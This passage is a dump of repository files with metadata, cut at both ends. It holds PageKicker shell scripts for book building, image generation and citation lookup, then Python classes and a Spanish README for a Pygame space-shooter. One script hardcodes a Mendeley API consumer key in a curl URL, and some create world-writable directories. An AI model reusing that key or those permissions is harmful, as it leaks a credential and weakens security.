$metadatatargetpath$uuid\"/current-import.csv\"\n \n# what is the product type id?\n\necho -n \"downloadable,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\t\n# has the product status changed?\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# what is the value of product_changed_websites\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tier prices\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#associated products\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#adwords grouped \n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# weight\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#downloadable options\n\n# note that file path is relative to media/import because that's where Magento (not SFB) assumes the file will be\n\nlink1name=\"Poster_Sized_Word_Cloud\"\nlink2name=\"Candidate_Acronyms\"\nlink3name=\"Readability_Report\"\nlink4name=\"Keywords\"\nlink5name=\"Automatic_Summary\"\nlink6name=\"All_Images_Montage\"\nlink7name=\"Top_N_Images_Montage\"\nfilename1=\"$sku\"wordcloudbig.png\nfilename2=\"$sku\"acronyms.txt\nfilename3=\"$sku\"rr.pdf\nfilename4=\"$sku\"all_nouns.txt\nfilename5=\"$sku\"summary.txt\nfilename6=\"$sku\"montage.jpg\nfilename7=\"$sku\"montagetopn.jpg\n\npipe=\"|\"\n\nif [ \"$montageur_success\" = 0 ] ; then\n\n\techo \"montageur ran successfully so adding links for montages to metadata\" | tee --append $xform_log\n\n\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5$pipe$link6name,0,9,file,$uuid/$filename6$pipe$link7name,0,9,file,$uuid/$filename7'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\nelse\n\n\techo \"montageur did not run successfully so not adding links for montages\" | tee --append $xform_log\n\n\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\nfi\n\n# echo additional columns\n\n# \"super_attribute_pricing\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"product_tags\"\n\n# . 
includes/keyword-reader\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"custom_design\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"page_layout\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"gift_message_available\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"downloadplus_serialnr_inactive\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"downloadable_additional_clogin\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# \"downloadable_link_emaildeliver\"\n#echo -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho \"finished writing metadata for this Document Analysis Report\" | tee --append $sfb_log\n\n# increment SKU by 1\nprevsku=$sku\nsku=$((sku+1)) \necho $sku >> \"$LOCAL_DATA\"\"SKUs/sku_list\"\necho \"incremented SKU by 1 to\" $sku \" and updated SKUs/sku_list\" \n\n\necho \"wrote metadata to \"$metadatatargetpath$uuid\"/current-import.csv\" | tee --append $sfb_log\n\n\n" }, { "alpha_fraction": 0.7313997745513916, "alphanum_fraction": 0.7313997745513916, "avg_line_length": 31.95833396911621, "blob_id": "9f694e846ac75dd6e3cefcb1bf7ef2b18fa21fb6", "content_id": "5e78ebc2da8d86132466a4906de7015f5e121467", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 793, "license_type": "permissive", "max_line_length": 79, "num_lines": 24, "path": "/scripts/includes/stopwords-switcher.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# selecting stopfile \n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelif [ \"$wikilang\" = \"de\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/de/stopwords-german.txt\"\nelif [ \"$wikilang\" = \"fr\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/fr/stopwords-french.txt\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\necho \"we are using language-specific stopfile $stopfile\"\n\nif cmp -s \"$stopfile\" \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating selected stopfile into place\"\n\tcp $stopfile \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\"\nfi \n\n" }, { "alpha_fraction": 0.5453821420669556, "alphanum_fraction": 0.5859872698783875, "avg_line_length": 56.09090805053711, "blob_id": "384c1895321bda154af002d01b1d9ef3412d0015", "content_id": "b6712c36d215020461f883cb8921f866dff78f32", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1256, "license_type": "permissive", "max_line_length": 497, "num_lines": 22, "path": "/scripts/includes/Tiphys-document-parser.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# Tiphys document parser\n\n# extracts citations from State of the Literature reviews\n\n# prioritize BibTeX\n\nwhile read inputline; do\n\n\t# parse the current line, not the loop's stdin, or the subshell would consume input.bib\n\texacttitle=$(echo \"$inputline\" | grep -v \"booktitle=\" | grep \"title={\" | sed 's/title={//g;s/},//g')\n\n\techo $exacttitle\n\techo \"exacttitle is\" $exacttitle | tee --append $tiphys_log\n# convert special characters occurring in the seed to their unicode equivalents for submission as $safeseed inside search query URL\n\n\n\tsafetitle=$(echo $exacttitle 
| sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/!/%21/g' -e 's/\"/%22/g' -e 's/#/%23/g' -e 's/\\$/%24/g' -e 's/\\&/%26/g' -e 's/'\\''/%27/g' -e 's/(/%28/g' -e 's/)/%29/g' -e 's/\\*/%2a/g' -e 's/+/%2b/g' -e 's/,/%2c/g' -e 's/-/%2d/g' -e 's/\\./%2e/g' -e 's/\\//%2f/g' -e 's/:/%3a/g' -e 's/;/%3b/g' -e 's/</%3c/g' -e 's/=/%3d/g' -e 's/>/%3e/g' -e 's/?/%3f/g' -e 's/@/%40/g' -e 's/\\[/%5b/g' -e 's/\\\\/%5c/g' -e 's/\\]/%5d/g' -e 's/\\^/%5e/g' -e 's/_/%5f/g' -e 's/`/%60/g' -e 's/{/%7b/g' -e 's/|/%7c/g' -e 's/}/%7d/g')\n\n\techo \"safetitle is \" $safetitle | tee --append $tiphys_log\n\n\tcurl --compressed --retry 2 --retry-delay 5 --retry-max-time 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/tiphys/mendeley/$searchterm.json http://api.mendeley.com/oapi/documents/search/$safetitle?consumer_key=13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6\n\ndone<tmp/input.bib\n" }, { "alpha_fraction": 0.7053719162940979, "alphanum_fraction": 0.7136363387107849, "avg_line_length": 26.6180362701416, "blob_id": "6067cb3f2b2ed02b1ce245cd35d8c2d54dfc58c4", "content_id": "b59748094c8cd8247c4d9848aebaefb091461421", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2420, "license_type": "permissive", "max_line_length": 178, "num_lines": 73, "path": "/scripts/includes/doc-processor.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nprocessthisdir=\"tmp/$uuid/\"\n\n# processes arbitrary collection of files found in the fetched directory and creates ebook\n\necho \"userdata directory is\" $userdatadir\n\nif [ \"$userdatadir\" = \"none\" ] ; then\n\n\techo \"no user files provided\"\n\nelse\n\t# echo flat directories only for now -- in future, support directory userdata via find command\n\t# cp -R \"$userdatadir\" tmp/$uuid/user\n\tcp \"$userdatadir\"/* tmp/$uuid/user\n\techo \"user provided files are\"\n\tls -la tmp/$uuid/user\n\n\t# process docs in user-submitted folder \n\n\tfor file in $processthisdir/user/*\n\tdo\n\tebook-convert $file $file\"fromuser.txt\" --pretty-print\n\tunoconv -f html $file\n\tpython includes/PKsum.py $file\"fromuser.txt\" -l \"$summary_length\" --output=$file\".summary\"\n\tdone\n\ncat \"$processthisdir\"user/*.html > $processthisdir/cumulative.html\ncat \"$processthisdir\"user/*.txt > $processthisdir/cumulative.txt\ncat \"$processthisdir\"user/*.summary > $processthisdir/all.summary.txt\n\nfi\n\n# xmlstarlet sel -t -v \"/api/parse/@*\" tmp/$uuid/$count.xml > tmp/$uuid/$count.html\n\n# process docs in wiki download folder and turn them into html and txt\n\nfor file in \"$processthisdir\"wiki/*.json\ndo\ncat $file | lib/jshon/jshon -e parse -e text -u | sed 's|<a[^>]* href=\"[^\"]*/|<a href=\"http://en.wikipedia.org/wiki/|g' > $file.html\nebook-convert $file.html $file.txt --pretty-print\npython includes/PKsum.py $file.txt -l \"$summary_length\" --output=$file.summary\ndone\n\n# echo building word cloud files\n\n\nfor file in $processthisdir/wiki/\ndo \n $JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 1800 -h 2700 < $file > $file\".cloudbase.png\" 2> /dev/null\ndone\n\ncat \"$processthisdir\"wiki/*.html >> $processthisdir/cumulative.html\ncat \"$processthisdir\"wiki/*.txt >> $processthisdir/cumulative.txt\ncat \"$processthisdir\"wiki/*.summary > $processthisdir/all.summary.txt\n\nunformattedwordcount=`wc -w < tmp/$uuid/cumulative.txt`\nwordcount=`wc -w < tmp/$uuid/cumulative.txt | sed -e :a -e 
's/\\(.*[0-9]\\)\\([0-9]\\{3\\}\\)/\\1,\\2/;ta' ` # this adds commas for presentation\necho \"unformattedwordcount is\" $unformattedwordcount\necho \"wordcount is \" $wordcount\n\nfor file in \"$processthisdir\"flickr/*.jpg # do not quote the glob or it will never expand\ndo\nxres=$(identify -format \"%[fx:resolution.x]\" $file)\nyres=$(identify -format \"%[fx:resolution.y]\" $file)\necho \"xres is\" $xres\necho \"yres is\" $yres\nif [ \"$xres\" -eq \"72\" ] ; then\n\techo \"xres is 72\"\nfi\n\ndone\n" }, { "alpha_fraction": 0.6532156467437744, "alphanum_fraction": 0.6681573987007141, "avg_line_length": 27.6180362701416, "blob_id": "188c245db0d4a6fccf8620e8a4c0000bc70e3af8", "content_id": "e06e4d5e9f69466d8946c57cfa948032dbe39364", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1118, "license_type": "permissive", "max_line_length": 105, "num_lines": 39, "path": "/test/builder_w_skyscraper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\npwd\necho \"**** BOOK BUILDER ****\"\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\necho -n \"pwd is \"\npwd\n. includes/set-variables.sh\n\nif [ ! \"$passuuid\" ] ; then\n\t#echo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nfi\n\n#echo \"$@\"\n$scriptpath\"bin/builder.sh\" -T \"booktitle\" -J \"default\" -S \"Paella\" --passuuid \"$uuid\" --skyscraper \"yes\"\ncp $TMPDIR$uuid/*.epub $TMPDIR\"/delivery.epub\"\ncp $TMPDIR$uuid/4stdout.txt $TMPDIR\"/4stdout.txt\"\nif [ ! -f \"$TMPDIR$uuid/ebookcover.jpg\" ]; then\n    echo \"error: cover not found! 
at \"$TMPDIR$uuid\"/ebookcover.jpg\" > \"$TMPDIR$uuid/error.log\"\nfi\nexit 0\n# if error log is empty then PASS\necho \"\\n\"\necho \"PASS\" \" $uuid\" | tee -a $LOCAL_DATA/logs/error.log\n" }, { "alpha_fraction": 0.7338767051696777, "alphanum_fraction": 0.7558469176292419, "avg_line_length": 54.33333206176758, "blob_id": "0baaa6d28bbb72e693d3691d6f5674b0e27bfb19", "content_id": "8cf2785cf48a89e89539332c82f94b59b6e4bf26", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2822, "license_type": "permissive", "max_line_length": 240, "num_lines": 51, "path": "/scripts/includes/1000x3000skyscraper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "convert -units pixelsperinch -density 300 -size 1000x200 -background blue -fill Yellow -gravity center -font \"$toplabelfont\" caption:\"$booktitle\" $TMPDIR$uuid/toplabel1.png\nsed -i '1i # Important Proper Nouns and Key Terms' \"$TMPDIR\"$uuid/all_nouns.txt\nsed -i '1i \\' \"$TMPDIR\"$uuid/all_nouns.txt\nsed -i G \"$TMPDIR\"$uuid/all_nouns.txt\necho '\\pagenumbering{gobble}' > $TMPDIR$uuid/all_nouns_sky.txt\necho \" \" >> $TMPDIR$uuid/all_nouns_sky.txt\nsed -n 1,25p $TMPDIR$uuid/all_nouns.txt >> $TMPDIR$uuid/all_nouns_sky.txt\ncp \"$TMPDIR\"$uuid/all_nouns.txt \"$TMPDIR\"$uuid/all_nouns.md\ncp \"$TMPDIR\"$uuid/all_nouns_sky.txt \"$TMPDIR\"$uuid/all_nouns_sky.md\n\necho -e '\\pagenumbering{gobble}\\n' | cat - $TMPDIR$uuid/sources.md > /tmp/out && mv /tmp/out $TMPDIR$uuid/sources.md\n\n# make pdf\n\ncat $TMPDIR$uuid/topics_covered.md $TMPDIR$uuid/pp_summary_sky.md $TMPDIR$uuid/sources.md | pandoc --latex-engine=xelatex --template=$confdir\"pandoc_templates/nonumtemplate.tex\" -o $TMPDIR$uuid/infocard.pdf -V \"geometry:paperheight=22.0in\"\n\n# make png\n/usr/bin/convert $TMPDIR$uuid/infocard.pdf -density 400 -trim $TMPDIR$uuid/infocard.png\necho \"if error issued here see comments in includes/1000x3000skyscraper.sh for comments\"\n# if imagemagick is installed from source, previous line may issue warning\n# that configuration file for delegates is missing. if the command is\n# working correctly to produce trimmed infocard you can ignore\n# the warning--this means that the correct delegate program is already\n# on the system. if the command is not producing the trimmed infocard\n# you need to fix the problem with ImageMagick. 
There are a number of\n# ways you can do this -- Google is your friend -- change convert to hard\n# code to a version of IM that works (which is done here) -- fix the IM configuration -- or\n# specify the delegate in the IM command line.\n\nif [ -z \"$add_this_image\" ]; then\n  echo \"using wordcloud image\"\n  cp $TMPDIR$uuid\"/cover/wordcloudcover.png\" $TMPDIR$uuid/skyscraperimage.png\n  convert $TMPDIR$uuid/skyscraperimage.png $TMPDIR$uuid/skyscraperimage.jpg\nelse\n  echo \"using user provided image\"\n  convert \"$add_this_image\" $TMPDIR$uuid/skyscraperimage.jpg\nfi\n\nconvert $TMPDIR$uuid/infocard.png -border 5 $TMPDIR$uuid/infocard.png\n# put logo on 1000 px wide & trim\nconvert $scriptpath\"assets/pk35pc.jpg\" -resize 50% $TMPDIR$uuid/pksmall.jpg\nconvert $TMPDIR$uuid\"/pksmall.jpg\" -gravity center -background white -extent 1000x108 $TMPDIR$uuid/skyscraperlogo.png\n# make skyscraper\nmontage $TMPDIR$uuid/toplabel1.png \\\n$TMPDIR$uuid/skyscraperimage.jpg \\\n$TMPDIR$uuid\"/infocard.png\" \\\n$TMPDIR$uuid/skyscraperlogo.png \\\n-geometry 1000x5000 -border 10 -tile 1x10 -mode concatenate \\\n$TMPDIR$uuid/skyscraper.jpg\n\nconvert $TMPDIR$uuid\"/skyscraper.jpg\" -trim -border 30 $TMPDIR$uuid/\"$safe_product_name\".skyscraper.jpg\n" }, { "alpha_fraction": 0.7887930870056152, "alphanum_fraction": 0.8041236996650696, "avg_line_length": 31.33333396911621, "blob_id": "fec57773cee93cc29389a02d86fd5bebb6c3a644", "content_id": "263e818403644ca6ba9a65d47355c7c6cc0039a7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 488, "license_type": "permissive", "max_line_length": 282, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Randolph_4.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Randy comes from a long family tradition of men's clubs. His great grandfather was a billing program at the Union League. As someone who has grown up in the tradition of joining a \"club\" he is well positioned to be the editor of the PageKicker series on \"Private Clubs in America\".\n\nWhen he is not researching for PageKicker, Randy loves to eat out. His mission is to taste every snapper soup recipe in every Club. Randy still swears he likes black bean better...\n" } ]
253
jgamer42/proyecto_compugrafica
https://github.com/jgamer42/proyecto_compugrafica
532176b31df4642dc950724297578d9761a8793f
fdd23a97b08c8712cd80b953bf0d1ae785fda1a4
4610d07419e4bd2bba6252faa497ff03c480a3d9
refs/heads/master
2022-09-01T04:49:20.588967
2020-05-30T06:54:10
2020-05-30T06:54:10
262,649,781
5
0
null
2020-05-09T20:06:05
2020-05-28T16:09:50
2020-05-30T06:54:11
Python
[ { "alpha_fraction": 0.6089239120483398, "alphanum_fraction": 0.6233595609664917, "avg_line_length": 33.6363639831543, "blob_id": "0b6f40834af8f548d27f3d3e61f207ea3d057d4d", "content_id": "e637aa3f4d05c78a77cebbd2d5c67e33fd985054", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/models/misil_enemigo.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "from .bala_base import Bala_base\nfrom . import utilidades\nimport pygame\n#cambios\n#1. se encapsulo el metodo animar en el paquete de utilidades\n# ver nueva logica de animacion en el update\nclass Misil_enemigo(Bala_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.posActual = pos\n pos_x = self.rect.x\n pos_y = self.rect.y\n sabana = pygame.image.load(\"./Sprites/balas/SpriteEnemyMisil_I.png\")\n self.animacion = utilidades.recorte_imagen(sabana,[19,88],3)\n self.frame = 0\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos_x\n self.rect.y = pos_y\n self.type = \"misil_enemigo\"\n self.daño = 130\n self.puntos = 6\n" }, { "alpha_fraction": 0.6834116578102112, "alphanum_fraction": 0.6971449255943298, "avg_line_length": 18.742856979370117, "blob_id": "c1b270130966d79d11380ab128826682869814dd", "content_id": "92138764aa4011d12639d7ec7cc100f1c41524bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2776, "license_type": "no_license", "max_line_length": 129, "num_lines": 140, "path": "/readme.md", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "# Galaxy War survival\n\n![logo del juego](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/fondos/LogoPantInit.png)\n\n## REQUERIMIENTOS\n\n* [x] intro :sunglasses:\n\n* [x] final :sunglasses:\n\n* [x] imagenes de fondo y musica :headphones:\n\n* [x] barra de información (gui) :eye:\n\n* [x] implementar 2 enemigos diferentes :space_invader: \n\n* [x] implementar 2 elementos ambientales :seedling:\n\n* [ ] implementar generadores de enemigos :anger:\n\n* [ ] implementar modificadores :dizzy:\n\n* [x] implementar como minimo 3 niveles (nota cada nivel con el triple de tamaño de la pantalla)\n\n## ELEMENTOS DE JUEGO\n\n### Jugador\n![imagen jugador](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/jugador/PlayerShipSprite_I.png)\n#### atributos\n\n* vidas = 3\n* salud = 1000\n* daño = Varia segund el bala (ver tipos de balas)\n* velocidad = 5 px\n#### comportamiento\n\n* colisiona con los bordes\n* no puede pasar de cierto punto de la pantalla\n* dispara proyectiles\n* posee diferentes estados\n\n#### detalles tecnicos\n * frames de animacion = 3\n * estados posibles = 3\n\n---\n\n### Enemigos\n\n#### tipo 1 (nombre)\n\n![enemigo basico](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/enemigos/SpriteEnemyShip_I.png)\n\n* ##### Atributos\n\n * vida = ??\n * daño = misil 1\n * velocidad = 5 px\n\n* ##### comportamiento\n\n * rebotan contra los limites laterales\n * no tienen movimiento vertical\n\n#### tipo 2 (nombre)\n\n* ##### Atributos\n\n * vida = cuanta vida tienen\n * daño = 700\n * velocidad = 5 px\n\n* ##### comportamiento\n \n * no dispara\n * rebota contra los limites de la pantalla\n * de manera aleatoria embiste al jugador para hacerle daño\n * la embestida solo permite 
vertical movement\n\n---\n\n### Bullets\n\n#### Missile\n \n ![bullet type 1](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/balas/SpritePlayerMisil_I.png)\n\n* ##### Attributes\n\n * damage = 130\n * speed = 50 px\n\n* ##### behavior\n\n * moves vertically until it leaves the screen\n\n#### type 2 (name)\n\n* ##### Attributes\n* ##### behavior\n\n\n-----\n\n### spawner\n\n----\n\n### blocks\n\n#### asteroid\n \n![asteroid](https://raw.githubusercontent.com/jgamer42/proyecto_compugrafica/master/Sprites/bloques/Asteroid.png)\n\n * characteristics\n   * deals damage on collision\n   * appears from outside the screen and moves according to the speed of the environment\n----\n\n### modifiers\n\n## MECHANICS\n\n* ### stage\n\n  * The stage has several environmental elements\n  * it scrolls at a speed of 20 px\n\n* ### victory condition\n\n  * beat the last level\n\n* ### game over condition\n  * the player runs out of lives\n\n* ### level change condition\n\n## DESIGNS\n\n* ### gui\n\n\n\n" }, { "alpha_fraction": 0.5712401270866394, "alphanum_fraction": 0.5910290479660034, "avg_line_length": 29.31999969482422, "blob_id": "0e964e8639a2e977a2a977c94c4287699e2cbcf5", "content_id": "4a20fedb4de515c6c55c3c1d1cdb5fb3a6c38ecc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 759, "license_type": "no_license", "max_line_length": 78, "num_lines": 25, "path": "/models/misil2.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "from .bala_base import Bala_base\nfrom . import utilidades\nimport pygame\n\nclass Misil2(Bala_base):\n\n    def __init__(self,pos):\n        super().__init__(pos)\n        pos_x = self.rect.x\n        pos_y = self.rect.y\n        sabana = pygame.image.load(\"./Sprites/balas/SpritePlayerMisil_II.png\")\n        self.animacion = utilidades.recorte_imagen(sabana,[15.3,88],3)\n        self.frame = 0\n        self.vely = -70\n        self.image = self.animacion[self.frame]\n        self.rect = self.image.get_rect()\n        self.rect.x = pos_x\n        self.rect.y = pos_y\n        self.type = \"misil2\"\n        self.daño = 253\n\n    def update(self):\n        super().update()\n        self.frame = utilidades.animar(self.frame,3)\n        self.image = self.animacion[self.frame]\n" }, { "alpha_fraction": 0.5653923749923706, "alphanum_fraction": 0.5835009813308716, "avg_line_length": 28.235294342041016, "blob_id": "3527b6bb0858f7059ba672908bf1815386435e44", "content_id": "85aec91ad4a4002f83fe94baa65186a901c59b42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 45, "num_lines": 17, "path": "/models/bala_base.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . 
import constantes\n\nclass Bala_base(pygame.sprite.Sprite):\n def __init__(self,pos):\n pygame.sprite.Sprite.__init__(self)\n self.velx = 0\n self.vely = 50\n self.image = pygame.Surface([10,50])\n self.image.fill(constantes.AZUL)\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n\n def update(self):\n self.rect.y = self.rect.y + self.vely\n self.rect.x = self.rect.x + self.velx\n" }, { "alpha_fraction": 0.6097902059555054, "alphanum_fraction": 0.6265734434127808, "avg_line_length": 30.086956024169922, "blob_id": "0afc49bab0330a4c532d87e4f8acd38672039e2d", "content_id": "8ebf84f7a152dbf5ad0a84e8a187bd4b2687983c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 715, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/models/planeta.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom . import constantes\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . import utilidades as util\n\nclass Planeta(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.frame = 0\n self.type = \"planeta\"\n sabana = pygame.image.load(\"./Sprites/bloques/Planeta1.png\")\n self.animacion = util.recorte_explosion(sabana,[72,72],5,4)\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n\n def update(self):\n self.frame = util.animar(self.frame,19)\n self.image = self.animacion[self.frame]\n super().update()\n" }, { "alpha_fraction": 0.5984929800033569, "alphanum_fraction": 0.614639401435852, "avg_line_length": 34.730770111083984, "blob_id": "3d7c6372b9d3581a2ddb8e8786aa7b2fa29b9c88", "content_id": "894fcd8d58152313dfde9e7f79bb771a69a1e4ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 929, "license_type": "no_license", "max_line_length": 73, "num_lines": 26, "path": "/models/enemigo_base.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import constantes\nclass Enemigo_base(pygame.sprite.Sprite):\n def __init__(self,pos,direccion,agresividad):\n pygame.sprite.Sprite.__init__(self)\n self.posActual = pos\n self.velx = 8*direccion\n self.vely = 0\n self.image=pygame.Surface([50,50])\n self.image.fill(constantes.AZUL)\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.direccion = 1\n self.agresividad = agresividad\n\n def update(self):\n self.comportamiento_limites()\n self.posActual[0] = self.rect.x + self.velx*self.direccion\n self.rect.x = self.posActual[0]\n self.posActual[1] = self.rect.y + self.vely\n self.rect.y = self.posActual[1]\n\n def comportamiento_limites(self):\n if(self.rect.left <= 0) or (self.rect.right >= constantes.ANCHO):\n self.direccion = self.direccion*-1\n" }, { "alpha_fraction": 0.5927174687385559, "alphanum_fraction": 0.6109238266944885, "avg_line_length": 32.70454406738281, "blob_id": "6c0ad2d5037de10e6983bb21da62eb491c61732c", "content_id": "6142f7763a21e5a1c774daa8b14bb508e36beb66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1483, "license_type": "no_license", "max_line_length": 78, "num_lines": 44, "path": "/models/enemigo1.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .enemigo_base import Enemigo_base\nfrom . 
import utilidades as util\nfrom . import ambiente\n\nclass Enemigo1(Enemigo_base):\n def __init__(self,pos,direccion,agresividad):\n super().__init__(pos,direccion,agresividad)\n self.frame = 0\n sabana = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyShip_I.png\")\n self.animacion = util.recorte_imagen(sabana,[87,75],3,2)\n self.fila_animacion = 0\n self.image = self.animacion[self.fila_animacion][self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.atacando = False\n self.type = \"enemigo1\"\n self.salud = 500\n self.puntos_impacto = 11\n self.puntos_destruir = 18\n\n def atacar(self):\n ataque = None\n if not(self.atacando):\n ataque = random.randint(0,self.agresividad)\n if(ataque == 0):\n ambiente.alarma_disparo_enemigo = True\n ambiente.origen_disparo_enemigo = self.rect.center\n\n def update(self):\n self.atacar()\n super().update()\n self.frame = util.animar(self.frame,3)\n self.cambio_animacion()\n self.image = self.animacion[self.fila_animacion][self.frame]\n\n def cambio_animacion(self):\n self.frame = util.animar(self.frame,3)\n if self.direccion > 0:\n self.fila_animacion = 0\n elif self.direccion < 0:\n self.fila_animacion = 1\n" }, { "alpha_fraction": 0.5826893448829651, "alphanum_fraction": 0.6012364625930786, "avg_line_length": 29.809524536132812, "blob_id": "520fc8fd534d813b3047944c18bbd0826dbb78a2", "content_id": "e4aa28219913d7ed246c71f6dfe107a668f85396", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 647, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/models/bloque_base.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom. import constantes\n\n\nclass Bloque_base(pygame.sprite.Sprite):\n def __init__(self,pos):\n pygame.sprite.Sprite.__init__(self)\n self.posActual = pos\n self.velx = 0\n self.vely = constantes.VELOCIDAD_ENTORNO\n self.image = pygame.Surface([50,100])\n self.image.fill(constantes.ROJO)\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n\n def update(self):\n 